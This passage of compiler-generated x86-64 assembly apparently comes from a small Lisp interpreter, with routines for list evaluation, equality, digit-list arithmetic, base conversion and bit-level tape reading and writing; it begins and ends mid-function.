L18_0_set_66 .long L18_0_set_67 .end_data_region ## -- End function .globl _evalst ## -- Begin function evalst .p2align 4, 0x90 _evalst: ## @evalst .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) cmpq $0, -16(%rbp) jne LBB19_2 ## %bb.1: movq $0, -8(%rbp) jmp LBB19_7 LBB19_2: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi movq -24(%rbp), %rsi callq _eval movq %rax, -32(%rbp) cmpq $0, -32(%rbp) jge LBB19_4 ## %bb.3: movq -32(%rbp), %rax movq %rax, -8(%rbp) jmp LBB19_7 LBB19_4: movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi movq -24(%rbp), %rsi callq _evalst movq %rax, -40(%rbp) cmpq $0, -40(%rbp) jge LBB19_6 ## %bb.5: movq -40(%rbp), %rax movq %rax, -8(%rbp) jmp LBB19_7 LBB19_6: movq -32(%rbp), %rdi movq -40(%rbp), %rsi callq _cons movq %rax, -8(%rbp) LBB19_7: movq -8(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _eq ## -- Begin function eq .p2align 4, 0x90 _eq: ## @eq .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) movq -16(%rbp), %rax cmpq -24(%rbp), %rax jne LBB20_2 ## %bb.1: movq $1, -8(%rbp) jmp LBB20_14 LBB20_2: movq -16(%rbp), %rcx movq _numb@GOTPCREL(%rip), %rax movswl (%rax,%rcx,2), %eax cmpl $0, %eax je LBB20_5 ## %bb.3: movq -24(%rbp), %rcx movq _numb@GOTPCREL(%rip), %rax movswl (%rax,%rcx,2), %eax cmpl $0, %eax je LBB20_5 ## %bb.4: movq -16(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi movq -24(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rsi callq _eq_wrd movq %rax, -8(%rbp) jmp LBB20_14 LBB20_5: movq -16(%rbp), %rcx movq _numb@GOTPCREL(%rip), %rax movswl (%rax,%rcx,2), %eax cmpl $0, %eax jne LBB20_7 ## %bb.6: movq -24(%rbp), %rcx movq _numb@GOTPCREL(%rip), %rax movswl (%rax,%rcx,2), %eax cmpl $0, %eax je LBB20_8 LBB20_7: movq $0, -8(%rbp) jmp LBB20_14 LBB20_8: movq -16(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax movswl (%rax,%rcx,2), %eax cmpl $0, %eax jne LBB20_10 ## %bb.9: movq -24(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax movswl (%rax,%rcx,2), %eax cmpl $0, %eax je LBB20_11 LBB20_10: movq $0, -8(%rbp) jmp LBB20_14 LBB20_11: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi movq -24(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rsi callq _eq cmpq $0, %rax je LBB20_13 ## %bb.12: movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi movq -24(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rsi callq _eq movq %rax, -8(%rbp) jmp LBB20_14 LBB20_13: movq $0, -8(%rbp) LBB20_14: movq -8(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _append ## -- Begin function append .p2align 4, 0x90 _append: ## @append .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) cmpq $0, -16(%rbp) jne LBB21_2 ## %bb.1: movq -24(%rbp), %rax movq %rax, -8(%rbp) jmp LBB21_3 LBB21_2: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -32(%rbp) ## 8-byte Spill movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi movq -24(%rbp), %rsi callq _append movq -32(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, -8(%rbp) LBB21_3: movq -8(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _length ## -- Begin function length .p2align 4, 0x90 _length: ## @length .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -16(%rbp) movq -16(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) je LBB22_2 ## %bb.1: movq $0, -8(%rbp) jmp LBB22_3 LBB22_2: movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi callq _length movq %rax, %rdi callq _add1 movq %rax, -8(%rbp) LBB22_3: movq -8(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _compare ## -- Begin function compare .p2align 4, 0x90 _compare: ## @compare .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) cmpq $0, -16(%rbp) jne LBB23_3 ## %bb.1: cmpq $0, -24(%rbp) jne LBB23_3 ## %bb.2: movq $61, -8(%rbp) jmp LBB23_17 LBB23_3: cmpq $0, -16(%rbp) jne LBB23_6 ## %bb.4: cmpq $0, -24(%rbp) je LBB23_6 ## %bb.5: movq $60, -8(%rbp) jmp LBB23_17 LBB23_6: cmpq $0, -16(%rbp) je LBB23_9 ## %bb.7: cmpq $0, -24(%rbp) jne LBB23_9 ## %bb.8: movq $62, -8(%rbp) jmp LBB23_17 LBB23_9: movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi movq -24(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rsi callq _compare movq %rax, -32(%rbp) cmpq $61, -32(%rbp) je LBB23_11 ## %bb.10: movq -32(%rbp), %rax movq %rax, -8(%rbp) jmp LBB23_17 LBB23_11: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -40(%rbp) movq -24(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -48(%rbp) movq -40(%rbp), %rax cmpq -48(%rbp), %rax jne LBB23_13 ## %bb.12: movq $61, -8(%rbp) jmp LBB23_17 LBB23_13: movq -40(%rbp), %rax cmpq -48(%rbp), %rax jge LBB23_15 ## %bb.14: movq $60, -8(%rbp) jmp LBB23_17 LBB23_15: movq -40(%rbp), %rax cmpq -48(%rbp), %rax jle LBB23_17 ## %bb.16: movq $62, -8(%rbp) LBB23_17: movq -8(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _nmb ## -- Begin function nmb .p2align 4, 0x90 _nmb: ## @nmb .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -16(%rbp) movq -16(%rbp), %rcx movq _numb@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) je LBB24_2 ## %bb.1: movq -16(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -8(%rbp) jmp LBB24_3 LBB24_2: movq $0, -8(%rbp) LBB24_3: movq -8(%rbp), %rax popq %rbp retq .cfi_endproc ## -- End function .globl _addition ## -- Begin function addition .p2align 4, 0x90 _addition: ## @addition .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $96, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) movq %rdx, -32(%rbp) cmpq $0, -16(%rbp) jne LBB25_3 ## %bb.1: cmpq $0, -32(%rbp) jne LBB25_3 ## %bb.2: movq -24(%rbp), %rax movq %rax, -8(%rbp) jmp LBB25_15 LBB25_3: cmpq $0, -24(%rbp) jne LBB25_6 ## %bb.4: cmpq $0, -32(%rbp) jne LBB25_6 ## %bb.5: movq -16(%rbp), %rax movq %rax, -8(%rbp) jmp LBB25_15 LBB25_6: cmpq $0, -16(%rbp) je LBB25_8 ## %bb.7: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -48(%rbp) movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -64(%rbp) jmp LBB25_9 LBB25_8: movq $48, -48(%rbp) movq $0, -64(%rbp) LBB25_9: cmpq $0, -24(%rbp) je LBB25_11 ## %bb.10: movq -24(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -56(%rbp) movq -24(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -72(%rbp) jmp LBB25_12 LBB25_11: movq $48, -56(%rbp) movq $0, -72(%rbp) LBB25_12: movq -48(%rbp), %rax addq -56(%rbp), %rax addq -32(%rbp), %rax subq $48, %rax movq %rax, -40(%rbp) cmpq $57, -40(%rbp) jg LBB25_14 ## %bb.13: movq -40(%rbp), %rax movq %rax, -80(%rbp) ## 8-byte Spill movq -64(%rbp), %rdi movq -72(%rbp), %rsi xorl %eax, %eax movl %eax, %edx callq _addition movq -80(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, -8(%rbp) jmp LBB25_15 LBB25_14: movq -40(%rbp), %rax subq $10, %rax movq %rax, -88(%rbp) ## 8-byte Spill movq -64(%rbp), %rdi movq -72(%rbp), %rsi movl $1, %edx callq _addition movq -88(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, -8(%rbp) LBB25_15: movq -8(%rbp), %rax addq $96, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _multiplication ## -- Begin function multiplication .p2align 4, 0x90 _multiplication: ## @multiplication .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) movq $0, -32(%rbp) cmpq $0, -24(%rbp) jne LBB26_2 ## %bb.1: movq $0, -8(%rbp) jmp LBB26_9 LBB26_2: jmp LBB26_3 LBB26_3: ## =>This Loop Header: Depth=1 ## Child Loop BB26_5 Depth 2 cmpq $0, -16(%rbp) je LBB26_8 ## %bb.4: ## in Loop: Header=BB26_3 Depth=1 movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -40(%rbp) LBB26_5: ## Parent Loop BB26_3 Depth=1 ## => This Inner Loop Header: Depth=2 movq -40(%rbp), %rax movq %rax, %rcx addq $-1, %rcx movq %rcx, -40(%rbp) cmpq $48, %rax jle LBB26_7 ## %bb.6: ## in Loop: Header=BB26_5 Depth=2 movq -32(%rbp), %rdi movq -24(%rbp), %rsi xorl %eax, %eax movl %eax, %edx callq _addition movq %rax, -32(%rbp) jmp LBB26_5 LBB26_7: ## in Loop: Header=BB26_3 Depth=1 movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -16(%rbp) movq -24(%rbp), %rsi movl $48, %edi callq _cons movq %rax, -24(%rbp) jmp LBB26_3 LBB26_8: movq -32(%rbp), %rax movq %rax, -8(%rbp) LBB26_9: movq -8(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _exponentiation ## -- Begin function exponentiation .p2align 4, 0x90 _exponentiation: ## @exponentiation .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movl $49, %edi xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, -24(%rbp) LBB27_1: ## =>This Inner Loop Header: Depth=1 cmpq $0, -16(%rbp) je LBB27_3 ## %bb.2: ## in Loop: Header=BB27_1 Depth=1 movq -8(%rbp), %rdi movq -24(%rbp), %rsi callq _multiplication movq %rax, -24(%rbp) movq -16(%rbp), %rdi callq _sub1 movq %rax, -16(%rbp) jmp LBB27_1 LBB27_3: movq -24(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _subtraction ## -- Begin function subtraction .p2align 4, 0x90 _subtraction: ## @subtraction .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $96, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) movq %rdx, -32(%rbp) cmpq $0, -24(%rbp) jne LBB28_3 ## %bb.1: cmpq $0, -32(%rbp) jne LBB28_3 ## %bb.2: movq -16(%rbp), %rax movq %rax, -8(%rbp) jmp LBB28_12 LBB28_3: cmpq $0, -16(%rbp) je LBB28_5 ## %bb.4: movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -48(%rbp) movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -64(%rbp) jmp LBB28_6 LBB28_5: movq $48, -48(%rbp) movq $0, -64(%rbp) LBB28_6: cmpq $0, -24(%rbp) je LBB28_8 ## %bb.7: movq -24(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -56(%rbp) movq -24(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -72(%rbp) jmp LBB28_9 LBB28_8: movq $48, -56(%rbp) movq $0, -72(%rbp) LBB28_9: movq -48(%rbp), %rax subq -56(%rbp), %rax subq -32(%rbp), %rax addq $48, %rax movq %rax, -40(%rbp) cmpq $48, -40(%rbp) jl LBB28_11 ## %bb.10: movq -40(%rbp), %rax movq %rax, -80(%rbp) ## 8-byte Spill movq -64(%rbp), %rdi movq -72(%rbp), %rsi xorl %eax, %eax movl %eax, %edx callq _subtraction movq -80(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, -8(%rbp) jmp LBB28_12 LBB28_11: movq -40(%rbp), %rax addq $10, %rax movq %rax, -88(%rbp) ## 8-byte Spill movq -64(%rbp), %rdi movq -72(%rbp), %rsi movl $1, %edx callq _subtraction movq -88(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi callq _cons movq %rax, -8(%rbp) LBB28_12: movq -8(%rbp), %rax addq $96, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _base2_to_10 ## -- Begin function base2_to_10 .p2align 4, 0x90 _base2_to_10: ## @base2_to_10 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq $0, -16(%rbp) LBB29_1: ## =>This Inner Loop Header: Depth=1 movq -8(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) setne %al xorb $-1, %al testb $1, %al jne LBB29_2 jmp LBB29_7 LBB29_2: ## in Loop: Header=BB29_1 Depth=1 movq -8(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -24(%rbp) movq -8(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -8(%rbp) movq -24(%rbp), %rcx movq _numb@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) je LBB29_4 ## %bb.3: ## in Loop: Header=BB29_1 Depth=1 movq -24(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax cmpq $0, (%rax,%rcx,8) je LBB29_5 LBB29_4: ## in Loop: Header=BB29_1 Depth=1 movq $1, -24(%rbp) jmp LBB29_6 LBB29_5: ## in Loop: Header=BB29_1 Depth=1 movq $0, -24(%rbp) LBB29_6: ## in Loop: Header=BB29_1 Depth=1 movq -16(%rbp), %rdi movq -16(%rbp), %rsi movq -24(%rbp), %rdx callq _addition movq %rax, -16(%rbp) jmp LBB29_1 LBB29_7: movq -16(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _base10_to_2 ## -- Begin function base10_to_2 .p2align 4, 0x90 _base10_to_2: ## @base10_to_2 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq $0, -16(%rbp) LBB30_1: ## =>This Inner Loop Header: Depth=1 cmpq $0, -8(%rbp) je LBB30_6 ## %bb.2: ## in Loop: Header=BB30_1 Depth=1 movq -8(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax subq $48, %rax movq %rax, -24(%rbp) movq -24(%rbp), %rax movl $2, %ecx cqto idivq %rcx cmpq $0, %rdx je LBB30_4 ## %bb.3: ## in Loop: Header=BB30_1 Depth=1 movq _wrd_one@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -32(%rbp) ## 8-byte Spill jmp LBB30_5 LBB30_4: ## in Loop: Header=BB30_1 Depth=1 movq _wrd_zero@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -32(%rbp) ## 8-byte Spill LBB30_5: ## in Loop: Header=BB30_1 Depth=1 movq -32(%rbp), %rdi ## 8-byte Reload movq -16(%rbp), %rsi callq _cons movq %rax, -16(%rbp) movq -8(%rbp), %rdi callq _halve movq %rax, -8(%rbp) jmp LBB30_1 LBB30_6: movq -16(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _size ## -- Begin function size .p2align 4, 0x90 _size: ## @size .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) movq $0, -24(%rbp) movq -16(%rbp), %rcx movq _numb@GOTPCREL(%rip), %rax movswl (%rax,%rcx,2), %eax cmpl $0, %eax je LBB31_3 ## %bb.1: movq -16(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax cmpq $0, (%rax,%rcx,8) jne LBB31_3 ## %bb.2: xorl %eax, %eax movl %eax, %edi callq _add1 movq %rax, -8(%rbp) jmp LBB31_11 LBB31_3: movq -16(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) je LBB31_5 ## %bb.4: movq -16(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi callq _length movq %rax, -8(%rbp) jmp LBB31_11 LBB31_5: jmp LBB31_6 LBB31_6: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) setne %al xorb $-1, %al testb $1, %al jne LBB31_7 jmp LBB31_10 LBB31_7: ## in Loop: Header=BB31_6 Depth=1 movq -24(%rbp), %rax movq %rax, -32(%rbp) ## 8-byte Spill movq -16(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi callq _size movq -32(%rbp), %rdi ## 8-byte Reload movq %rax, %rsi xorl %eax, %eax movl %eax, %edx callq _addition movq %rax, -24(%rbp) movq -16(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -16(%rbp) movq -16(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) jne LBB31_9 ## %bb.8: ## in Loop: Header=BB31_6 Depth=1 movq -24(%rbp), %rdi callq _add1 movq %rax, -24(%rbp) LBB31_9: ## in Loop: Header=BB31_6 Depth=1 jmp LBB31_6 LBB31_10: movq -24(%rbp), %rdi callq _add1 movq %rax, %rdi callq _add1 movq %rax, -8(%rbp) LBB31_11: movq -8(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _read_bit ## -- Begin function read_bit .p2align 4, 0x90 _read_bit: ## @read_bit .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq _turing_machine_tapes@GOTPCREL(%rip), %rax movq (%rax), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -24(%rbp) movq -24(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) je LBB32_2 ## %bb.1: xorl %eax, %eax ## kill: def $rax killed $eax movq _wrd_out_of_data@GOTPCREL(%rip), %rcx subq (%rcx), %rax movq %rax, -8(%rbp) jmp LBB32_6 LBB32_2: movq -24(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -16(%rbp) movq -24(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdx movq _turing_machine_tapes@GOTPCREL(%rip), %rax movq (%rax), %rcx movq _car@GOTPCREL(%rip), %rax movq %rdx, (%rax,%rcx,8) movq -16(%rbp), %rcx movq _numb@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) je LBB32_4 ## %bb.3: movq -16(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax cmpq $0, (%rax,%rcx,8) je LBB32_5 LBB32_4: movq _wrd_one@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) jmp LBB32_6 LBB32_5: movq _wrd_zero@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) LBB32_6: movq -8(%rbp), %rax popq %rbp retq .cfi_endproc ## -- End function .globl _write_lst ## -- Begin function write_lst .p2align 4, 0x90 _write_lst: ## @write_lst .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rcx movq _numb@GOTPCREL(%rip), %rax movswl (%rax,%rcx,2), %eax cmpl $0, %eax je LBB33_3 ## %bb.1: movq -8(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax cmpq $0, (%rax,%rcx,8) jne LBB33_3 ## %bb.2: movl $48, %edi callq _write_chr jmp LBB33_11 LBB33_3: movq -8(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) je LBB33_5 ## %bb.4: movq -8(%rbp), %rcx movq _pname@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi callq _write_atm jmp LBB33_11 LBB33_5: movl $40, %edi callq _write_chr LBB33_6: ## =>This Inner Loop Header: Depth=1 movq -8(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) setne %al xorb $-1, %al testb $1, %al jne LBB33_7 jmp LBB33_10 LBB33_7: ## in Loop: Header=BB33_6 Depth=1 movq -8(%rbp), %rcx movq _car@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rdi callq _write_lst movq -8(%rbp), %rcx movq _cdr@GOTPCREL(%rip), %rax movq (%rax,%rcx,8), %rax movq %rax, -8(%rbp) movq -8(%rbp), %rcx movq _atom@GOTPCREL(%rip), %rax cmpw $0, (%rax,%rcx,2) jne LBB33_9 ## %bb.8: ## in Loop: Header=BB33_6 Depth=1 movl $32, %edi callq _write_chr LBB33_9: ## in Loop: Header=BB33_6 Depth=1 jmp LBB33_6 LBB33_10: movl $41, %edi callq _write_chr LBB33_11: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _write_chr ## -- Begin function write_chr .p2align 4, 0x90 _write_chr: ## @write_chr .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $80, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rax andq $128, %rax cmpq $0, %rax je LBB34_2 ## %bb.1: movq _wrd_one@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -16(%rbp) ## 8-byte Spill jmp LBB34_3 LBB34_2: movq _wrd_zero@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -16(%rbp) ## 8-byte Spill LBB34_3: movq -16(%rbp), %rdi ## 8-byte Reload xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, %rcx movq _q@GOTPCREL(%rip), %rax movq (%rax), %rdx movq _cdr@GOTPCREL(%rip), %rax movq %rcx, (%rax,%rdx,8) movq _q@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq -8(%rbp), %rax andq $64, %rax cmpq $0, %rax je LBB34_5 ## %bb.4: movq _wrd_one@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -24(%rbp) ## 8-byte Spill jmp LBB34_6 LBB34_5: movq _wrd_zero@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -24(%rbp) ## 8-byte Spill LBB34_6: movq -24(%rbp), %rdi ## 8-byte Reload xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, %rcx movq _q@GOTPCREL(%rip), %rax movq (%rax), %rdx movq _cdr@GOTPCREL(%rip), %rax movq %rcx, (%rax,%rdx,8) movq _q@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq -8(%rbp), %rax andq $32, %rax cmpq $0, %rax je LBB34_8 ## %bb.7: movq _wrd_one@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -32(%rbp) ## 8-byte Spill jmp LBB34_9 LBB34_8: movq _wrd_zero@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -32(%rbp) ## 8-byte Spill LBB34_9: movq -32(%rbp), %rdi ## 8-byte Reload xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, %rcx movq _q@GOTPCREL(%rip), %rax movq (%rax), %rdx movq _cdr@GOTPCREL(%rip), %rax movq %rcx, (%rax,%rdx,8) movq _q@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq -8(%rbp), %rax andq $16, %rax cmpq $0, %rax je LBB34_11 ## %bb.10: movq _wrd_one@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -40(%rbp) ## 8-byte Spill jmp LBB34_12 LBB34_11: movq _wrd_zero@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -40(%rbp) ## 8-byte Spill LBB34_12: movq -40(%rbp), %rdi ## 8-byte Reload xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, %rcx movq _q@GOTPCREL(%rip), %rax movq (%rax), %rdx movq _cdr@GOTPCREL(%rip), %rax movq %rcx, (%rax,%rdx,8) movq _q@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq -8(%rbp), %rax andq $8, %rax cmpq $0, %rax je LBB34_14 ## %bb.13: movq _wrd_one@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -48(%rbp) ## 8-byte Spill jmp LBB34_15 LBB34_14: movq _wrd_zero@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -48(%rbp) ## 8-byte Spill LBB34_15: movq -48(%rbp), %rdi ## 8-byte Reload xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, %rcx movq _q@GOTPCREL(%rip), %rax movq (%rax), %rdx movq _cdr@GOTPCREL(%rip), %rax movq %rcx, (%rax,%rdx,8) movq _q@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq -8(%rbp), %rax andq $4, %rax cmpq $0, %rax je LBB34_17 ## %bb.16: movq _wrd_one@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -56(%rbp) ## 8-byte Spill jmp LBB34_18 LBB34_17: movq _wrd_zero@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -56(%rbp) ## 8-byte Spill LBB34_18: movq -56(%rbp), %rdi ## 8-byte Reload xorl %eax, %eax movl %eax, %esi callq _cons movq %rax, %rcx movq _q@GOTPCREL(%rip), %rax movq (%rax), %rdx movq _cdr@GOTPCREL(%rip), %rax movq %rcx, (%rax,%rdx,8) movq _q@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq -8(%rbp), %rax andq $2, %rax cmpq $0, %rax je LBB34_20 ## %bb.19: movq _wrd_one@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -64(%rbp) ## 8-byte Spill jmp LBB34_21 LBB34_20: movq _wrd_zero@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -64(%rbp) ## 8-byte Spill LBB34_21: movq -64(%rbp), %rdi ## 8-byte Reload xorl %eax, %eax movl %eax, %esi callq _cons movq 